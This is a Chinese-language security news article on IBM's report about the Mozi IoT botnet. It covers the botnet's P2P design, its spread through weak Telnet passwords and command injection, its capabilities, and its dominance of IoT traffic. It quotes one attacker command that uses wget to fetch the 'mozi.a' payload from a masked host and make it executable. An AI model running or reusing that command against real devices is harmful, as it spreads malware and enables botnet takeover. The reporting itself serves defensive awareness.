IBM 报告：2019年10月至 2020年6月Mozi 僵尸网络占了 IoT 网络流量的 90％

Mozi是一个物联网僵尸网络，它借鉴了Mirai变体和Gafgyt恶意软件的代码，该代码于2019年底出现在威胁领域。

Mozi僵尸网络被360 Netlab的安全专家发现，当时它正通过探测弱Telnet密码来攻击Netkit、D-Link和华为路由器。

根据研究人员的说法，在2019年的最后几个月中，僵尸网络主要参与了DDoS攻击。

它实现了自定义扩展的分布式哈希表（DHT）协议，该协议提供类似于哈希表（[key，value]）的查找服务。

“ Mozi僵尸网络依靠DHT协议来构建P2P网络，并使用ECDSA384和xor算法来确保其组件和P2P网络的完整性和安全性。” 阅读专家发表的分析。“该示例通过带有弱密码和某些已知漏洞的Telnet通过Telnet传播（请参见下面的列表）。在功能方面，Mozi僵尸网络中每个节点的指令的执行由僵尸网络主服务器发出的称为Config的有效负载驱动。”

这种实现使得添加/删除节点变得非常简单，并且使用最少的workaround re- keys。

Mozi僵尸网络使用自己的扩展DHT协议实现来构建P2P网络。

该恶意软件通过尝试猜测目标设备的Telnet密码并利用已知漏洞进行传播。一旦获得对设备的访问权限，该机器人便会尝试执行恶意有效负载，并且该机器人将自动加入Mozi P2P网络。

僵尸网络支持以下功能：

• DDoS攻击
• 收集 Bot 信息
• 执行指定URL的负载
• 从指定的URL更新示例
• 执行系统或自定义命令

根据IBM发布的一份新报告，Mozi僵尸网络占2019年10月至2020年6月观察到的IoT网络流量的90％。如果我们考虑到与其他僵尸程序不同，它没有试图从受感染设备中移除竞争对手，那么这个百分比令人印象深刻。

研究人员认为，Mozi运营商将配置不良的设备作为攻击目标，但导致物联网攻击激增的因素之一是威胁行为者可以瞄准的“不断扩大的物联网格局”。专家解释说，全球大约有310亿个IoT设备部署，而IoT部署速率现在是每秒127个设备。

“ IBM的研究表明，Mozi在很大程度上继续通过使用命令注入（CMDi）攻击获得成功，这通常是由于IoT设备的配置错误造成的。” 读取IBM发布的报告。物联网使用率的持续增长和配置协议不完善是造成这一跃迁的罪魁祸首。由于COVID-19，更频繁地远程访问公司网络可能进一步推动了这一增长。”

CMDi攻击对于IoT设备非常普遍，在Mozi攻击的情况下，威胁参与者通过使用“ wget” shell命令然后更改权限以允许黑客与受影响的系统进行交互来利用CMDi。

在最近的Mozi攻击中，威胁行动者使用以下命令来确定设备是否易受CMDi攻击，然后他们将下载并执行“ mozi.a ”文件。

wget xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

“我们对这个特定样本的分析表明，该文件在没有 MIPS 架构的微处理器上执行。这是运行简化指令集计算机（RISC）架构的机器所理解的扩展，该架构在许多IoT设备上都很普遍。” 继续分析。“一旦攻击者通过僵尸网络获得对设备的完全访问权限，就可以更改固件级别，并且可以在设备上植入其他恶意软件。”

Mozi僵尸网络针对以下设备：

IBM研究人员发现，Mozi僵尸网络使用的基础设施主要位于中国（占84％）。

IBM发布的报告包含有关僵尸网络的其他详细信息，包括危害指标（IoC）。